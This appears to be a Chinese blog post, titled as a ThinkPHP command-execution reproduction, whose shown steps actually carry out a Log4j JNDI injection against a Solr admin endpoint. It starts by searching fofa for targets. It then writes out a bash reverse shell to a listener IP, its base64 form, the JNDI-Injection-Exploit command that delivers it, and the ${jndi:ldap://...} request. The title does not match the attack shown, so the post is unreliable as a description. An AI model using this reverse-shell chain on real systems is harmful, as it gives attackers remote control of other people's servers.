thinkphp之命令执行漏洞复现

实战:

fofa搜索thinkphp--

第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果

 

491f8115d0a117f057b0c64371d55fdf.png

 

4fbd04803681a3aa4a9f8affb3372fd4.png

返回dnslog查看到了Java的版本信息

 

125111dfdd47d12025e5a64204a2638c.png

打开kali监听端口

 

26b906f58698724f2e13893afa9fde2d.png

进行base64编码

bash -i >& /dev/tcp/192.168.189.150/8080 0>&1

我编码后的是

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx

1151889eaa918292a9f3aa94ceceb5b0.png

复制语句、

# 命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl
#我的命令语句是
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx}|{base64,-d}|bash" -A 192.168.189.150
​

bd271b1714b5901586ba905a7582c18f.png

访问一下kali里面得到的1.8版本的ldmp:/solr/admin/cores?action=${jndi:ldap://192.168.189.150:1389/jj9zyn
}

kali里面就可以监听的到了

 

  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值